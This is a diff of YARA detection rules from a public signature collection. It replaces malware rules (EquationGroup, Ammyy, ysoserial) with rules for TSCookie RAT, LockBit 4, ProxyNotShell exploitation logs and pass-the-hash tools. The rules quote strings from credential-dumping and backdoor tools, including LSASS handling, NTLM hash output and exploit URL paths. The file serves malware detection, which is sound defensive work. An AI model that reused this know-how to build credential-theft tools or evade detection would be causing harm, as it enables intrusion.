 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3ceb04b42b6e741b1578ec9ecb83b72c599d9af457d6d4e8de572e481d3aa5c"
-		score = 75
+		logic_hash = "bc07598570b6d4ebc5d14cedfed146c1ad309b8890bc0b9ee5f9ad645c1352e2"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
 
 	strings:
-		$s1 = "Unexpected value in memory.  Run the 'CheckOracle' or 'memcheck' command to identify the problem" fullword wide
-		$s2 = "Oracle process memory successfully modified!" fullword wide
-		$s3 = "Unable to reset the memory protection mask to the memory" fullword wide
+		$a1 = { 00 e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac }
+		$s1 = "<HTA:APPLICATION "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		filesize < 5MB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_1 : FILE
+
+rule SIGNATURE_BASE_Tscookie_RAT : FILE
 {
 	meta:
-		description = "EquationGroup Malware"
+		description = "Detects TSCookie RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "331d7ba5-e3fa-5ab7-b4de-c7af764be03d"
-		date = "2017-01-13"
+		id = "a2b6c598-4498-5c0a-9257-b0bf6cd28de9"
+		date = "2018-03-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1904-L1933"
+		reference = "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_tscookie_rat.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "97fe69f0c8f2fc44fdcd796c9390c3912f31c56540af1ca8f2baab16d1e91add"
+		logic_hash = "c6121c541a77219b17351787973a4bc06a8d941ebd5f9e5e1e14ad4740a3fe7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "694be2698bcc5c7a1cce11f8ef65c1c96a883d14b98148c36b32888fb58b6a7e"
-		hash2 = "73d1d55493886639c619e9f5e312daab93e4feeb74f24dbe51593842baac8d15"
-		hash3 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
-		hash4 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
-		hash5 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
-		hash6 = "8f5b97124de9fce16e2cfecb7dd2e171824c9e07546db7b3bee7c5f2c92ceda9"
-		hash7 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
-		hash8 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
-		hash9 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
-		hash10 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
-		hash11 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
-		hash12 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
-		hash13 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
-		hash14 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
-		hash15 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
+		hash1 = "2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d"
 
 	strings:
-		$x1 = "Injection Lib -  GetProcAddress failed on Kernel32.DLL function" fullword wide
-		$x2 = "Injection Lib -  JUMPUP failed to open requested process" fullword wide
+		$x1 = "[-] DecryptPassword_Outlook failed(err=%d)" fullword ascii
+		$x2 = "----------------------- Firefox Passwords ------------------" fullword ascii
+		$x3 = "--------------- Outlook Passwords ------------------" fullword ascii
+		$x4 = "----------------------- IE Passwords ------------------" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( pe.exports ( "DoWork" ) and pe.exports ( "PrintF" ) ) or 1 of them )
 }
-
-rule SIGNATURE_BASE_Equationdrug_MS_Identifier
+rule SIGNATURE_BASE_EXPL_Exploit_TLB_Scripts : FILE
 {
 	meta:
-		description = "Microsoft Identifier used in EquationDrug Platform"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "c934c117-bf5a-5688-acd9-5d6c6aacd6bc"
-		date = "2015-03-11"
+		description = "Detects malicious TLB files which may be delivered via Visual Studio projects"
+		author = "Rich Warren (slightly modified by Florian Roth)"
+		id = "5151458e-4c30-50ff-a39e-e5b5b68b87aa"
+		date = "2021-01-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1937-L1948"
+		reference = "https://github.com/outflanknl/Presentations/blob/master/Nullcon2020_COM-promise_-_Attacking_Windows_development_environments.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_tlb_scripts.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7b919c82b6e765be5adb927bf79d13f9b37a214a6f8a1f7b237a88ba46ae958c"
+		logic_hash = "39bf626d60a867d054762043f74e86998d6848439655f84be72003c112db9953"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$a = ".sct" ascii nocase
+		$b = "script:" ascii nocase
+		$c = "scriptlet:" ascii nocase
+		$d = "soap:" ascii nocase
+		$e = "winmgmts:" ascii nocase
 
 	condition:
-		$s1 and pe.timestamp > 946684800
+		uint32be( 0 ) == 0x4D534654 and filesize < 100KB and any of them
 }
-rule SIGNATURE_BASE_BTC_Miner_Lsass1_Chrome_2 : FILE
+rule SIGNATURE_BASE_Mal_Lockbit4_Hashing_Alg_Win_Feb24 : FILE
 {
 	meta:
-		description = "Detects a Bitcoin Miner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7960d96a-7bd3-5135-867d-e39a02274c45"
-		date = "2017-06-22"
-		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L10-L27"
+		description = "This rule detects the custom hashing algorithm of Lockbit4.0 unpacked"
+		author = "0x0d4y"
+		id = "e91aedba-6f70-4ca2-9217-2991cbbc6e8d"
+		date = "2024-02-16"
+		modified = "2025-03-20"
+		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lockbit4_hashing_alg_win_feb24.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef80dba71c901d6e821b2e08a701a82f8147e41a8f14c5fd324d5e043b0ff322"
-		score = 60
+		hash = "062311f136d83f64497fd81297360cd4"
+		logic_hash = "41497ea30a4cfdd111726a5819ec404a1eeba1693f5d6b89ac38558eb1c6bde9"
+		score = 100
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "048e9146387d6ff2ac055eb9ddfbfb9a7f70e95c7db9692e2214fa4bec3d5b2e"
-		hash2 = "c8db8469287d47ffdc74fe86ce0e9d6e51de67ba1df318573c9398742116a6e8"
+		license = "CC BY 4.0"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.lockbit"
 
 	strings:
-		$x1 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
-		$x2 = "-O, --userpass=U:P    username:password pair for mining server" fullword ascii
+		$hashing_alg = { 41 89 d0 46 0f be 04 00 45 09 c0 74 ?? 45 8d 48 ?? 45 8d 50 ?? 41 80 f9 ?? 45 0f 43 d0 44 31 d1 44 8d 04 3a 45 0f af c2 41 01 c8 89 d1 31 f9 09 d2 0f 44 ca 41 0f af c8 44 01 d1 ff c2 eb ?? 49 ff c6 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and $hashing_alg
 }
-rule SIGNATURE_BASE_CN_Actor_RA_Tool_Ammyy_Mscorsvw : FILE
+rule SIGNATURE_BASE_LOG_Proxynotshell_POC_CVE_2022_41040_Nov22 : CVE_2022_41040 CVE_2022_41082
 {
 	meta:
-		description = "Detects Ammyy remote access tool"
+		description = "Detects logs generated after a successful exploitation using the PoC code against CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) in Microsoft Exchange servers"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71a0c5a9-b4dc-508d-a6b7-4b85b75bc34b"
-		date = "2017-06-22"
+		id = "1e47d124-3103-5bf5-946f-b1bb69ff2c8e"
+		date = "2022-11-17"
 		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L29-L45"
+		reference = "https://github.com/testanull/ProxyNotShell-PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vuln_proxynotshell_cve_2022_41040.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c4b64b3aa63d80fa1a73b021bf49539af5888f53090555555c1f3fd7fbb90230"
-		score = 75
+		logic_hash = "7f91502fd9c59180970fc4253134582b44ba318db03ef4eb575257b2f3818d94"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
-		hash2 = "d9ec0a1be7cd218042c54bfbc12000662b85349a6b78731a09ed336e5d3cf0b4"
+		tags = "CVE-2022-41040, CVE-2022-41082"
 
 	strings:
-		$s1 = "Please enter password for accessing remote computer" fullword ascii
-		$s2 = "Die Zugriffsanforderung wurde vom Remotecomputer abgelehnt" fullword ascii
-		$s3 = "It will automatically be run the next time this computer is restart or you can start it manually" fullword ascii
+		$aa1 = " POST " ascii wide
+		$aa2 = " GET " ascii wide
+		$ab1 = " 200 " ascii wide
+		$s01 = "/autodiscover.json x=a" ascii wide
+		$s02 = "/autodiscover/admin@localhost/" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
+		1 of ( $aa* ) and $ab1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Actor_Ammyyadmin : FILE
+rule SIGNATURE_BASE_Whosthere_Alt : FILE
 {
 	meta:
-		description = "Detects Ammyy Admin Downloader"
+		description = "Auto-generated rule - file whosthere-alt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08ffb61a-e2de-538e-9d9f-040276324af9"
-		date = "2017-06-22"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "Internal Research - CN Actor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L47-L61"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b628c7e6debdd2b21a321dc2ec5838fd56107f4cac21bda8b9faa1c1d5b23b71"
-		score = 60
+		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
+		logic_hash = "ef7bccb8f63034b885cfaec27663c9b038cd9b1811b4f25a9eae28640dac248b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
 
 	strings:
-		$x2 = "\\Ammyy\\sources\\main\\Downloader.cpp" ascii
+		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+		$s2 = "dump output to a file, -o filename" fullword ascii
+		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
+		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii
+		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
+		$s6 = ".\\pth.dll" fullword ascii
+		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 280KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_Gopuram_Apr23 : FILE
+rule SIGNATURE_BASE_Iam_Alt_Iam_Alt : FILE
 {
 	meta:
-		description = "Detects Lazarus Gopuram malware"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
-		date = "2023-04-04"
+		description = "Auto-generated rule - file iam-alt.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cf8ec963-ed23-531e-8ea2-ff9f8643aa75"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_gopuram.yar#L1-L16"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L33-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
-		hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
-		logic_hash = "58d978bd09a656f2a10a4d5d2585e51efe5cfb6b6648a4b3c2ce8c4f5d2256d4"
-		score = 75
+		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
+		logic_hash = "acd4dae57e8394d4ce2f3dfb44706ea35c3d684ab34fd0c707b6aeedd816280a"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$path = "%s.TxR.0.regtrans-ms"
+		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
+		$s3 = "username:domainname:lmhash:nthash" fullword ascii
+		$s4 = "Error in cmdline!. Bye!." fullword ascii
+		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
+		$s6 = "nthash is too long!." fullword ascii
+		$s7 = "LSASS HANDLE: %x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $path and filesize < 10MB
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-rule SIGNATURE_BASE_Redsails_EXE : FILE
+rule SIGNATURE_BASE_Genhash_Genhash : FILE
 {
 	meta:
-		description = "Detects Red Sails Hacktool by WinDivert references"
+		description = "Auto-generated rule - file genhash.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7ebbebf-e2d6-5cd3-b859-b804d39d1641"
-		date = "2017-10-02"
+		id = "bec3c014-df3b-5ac0-9501-9b648856e02b"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/BeetleChunks/redsails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redsails.yar#L11-L25"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L56-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fe9232989fb29686f11ee8cd59090fb6602301b00ff12d4a0dff8279a1718086"
-		score = 75
+		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
+		logic_hash = "fe1ebe7ea94351610e0042eab020d155cbab26d790477909467c9b5a827fb6d6"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a7861d25b0c038d77838ecbd5ea5674650ad4f5faf7432a6f3cfeb427433fac"
 
 	strings:
-		$s1 = "bWinDivert64.dll" fullword ascii
-		$s2 = "bWinDivert32.dll" fullword ascii
+		$s1 = "genhash.exe <password>" fullword ascii
+		$s3 = "Password: %s" fullword ascii
+		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
+		$s5 = "This tool generates LM and NT hashes." fullword ascii
+		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Redsails_PY
+rule SIGNATURE_BASE_Iam_Iamdll : FILE
 {
 	meta:
-		description = "Detects Red Sails Hacktool - Python"
+		description = "Auto-generated rule - file iamdll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59d5e784-70ff-5061-9867-54c905ecfd8c"
-		date = "2017-10-02"
+		id = "15e8ddac-af17-5509-b552-b4364af57c90"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/BeetleChunks/redsails"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redsails.yar#L27-L45"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L76-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4c5426a427e2c25cf9e44ae5f9ec477c9ab11f611d9a0db444c36e7cae176562"
-		score = 75
+		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
+		logic_hash = "ef7c66d2e1204a43921b6701812ea8a7bfa8e39e24d9396c95b725a4a4171010"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661"
-		hash2 = "5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e"
 
 	strings:
-		$x1 = "Gained command shell on host" fullword ascii
-		$x2 = "[!] Received an ERROR in shell()" fullword ascii
-		$x3 = "Target IP address with backdoor installed" fullword ascii
-		$x4 = "Open backdoor port on target machine" fullword ascii
-		$x5 = "Backdoor port to open on victim machine" fullword ascii
+		$s0 = "LSASRV.DLL" fullword ascii
+		$s1 = "iamdll.dll" fullword ascii
+		$s2 = "ChangeCreds" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_Mozillarhino1 : FILE
+rule SIGNATURE_BASE_Iam_Iam : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file MozillaRhino1.bin"
+		description = "Auto-generated rule - file iam.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "15e8ddac-af17-5509-b552-b4364af57c90"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L10-L23"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L94-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ca8cdd2781812ed373ca558b3a5a2fac5d236e16e6dbb8d66caa45081aef968b"
-		score = 75
+		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
+		logic_hash = "f170f6f71b81a674a269ddd441c77a43afbbfe2870e1d0c4101abd2e58bff0b0"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8"
 
 	strings:
-		$s3 = "ysoserial.payloads" fullword ascii
+		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+		$s2 = "iam.exe -h administrator:mydomain:" ascii
+		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
+		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
+		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
+		$s6 = "Error in cmdline!. Bye!." fullword ascii
+		$s7 = "Checking LSASRV.DLL...." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 40KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_C3P0 : FILE
+rule SIGNATURE_BASE_Whosthere_Alt_Pth : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file C3P0.bin"
+		description = "Auto-generated rule - file pth.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L25-L38"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L116-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "53188caff69e1dbf655f4df7cda1406dd357af14a92ca4e686f514299b0adafc"
-		score = 75
+		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
+		logic_hash = "137b0dae105f97b5d4352d16e52144e72306e61be57c5d93df77ad3f5808018e"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9932108d65e26d309bf7d97d389bc683e52e91eb68d0b1c8adfe318a4ec6e58b"
 
 	strings:
-		$x1 = "exploitppppw" fullword ascii
+		$s0 = "c:\\debug.txt" fullword ascii
+		$s1 = "pth.dll" fullword ascii
+		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii
+		$s3 = "\"Primary\" string not found!" fullword ascii
+		$s4 = "segment 1 found at %.8Xh" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xedac and filesize < 3KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 4 of them
 }
-rule SIGNATURE_BASE_Ysoserial_Payload_Spring1
+rule SIGNATURE_BASE_Whosthere : FILE
 {
 	meta:
-		description = "Ysoserial Payloads - file Spring1.bin"
+		description = "Auto-generated rule - file whosthere.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/frohoff/ysoserial"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ysoserial_payloads.yar#L40-L59"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passthehashtoolkit.yar#L136-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "852390d242c5cac243b54c31234c0ef3e25cede376eea23c73f03d79c548be8a"
-		score = 75
+		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
+		logic_hash = "a13c8a1fc66381b040d6449fe9655191d7a1762da0dc70789cd497fb68fb2a55"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703"
-		hash2 = "9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a"
-		hash3 = "8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8"
-		hash4 = "5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c"
-		hash5 = "95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1"
-		hash6 = "1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187"
-		hash7 = "adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7"
 
 	strings:
-		$x1 = "ysoserial/Pwner" ascii
+		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
+		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
+		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
+		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 320KB and 2 of them
 }
-rule SIGNATURE_BASE_Ysoserial_Payload : FILE
+
+rule SIGNATURE_BASE_SUSP_THOR_Unsigned_Oct23_1 : FILE
 {
 	meta:
-		description = "Ysoserial Payloads"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c269e032-b6ce-5faa-b3ce-a5304f3e9dab"
-		date = "2017-02-04"
+		description = "Detects unsigned version of THOR scanner, which could be a backdoored / modified version of the scanner"
+		author = "Florian Roth"
+		id = "2ca6a192-675e-5f02-a7b1-40369eeb9904"
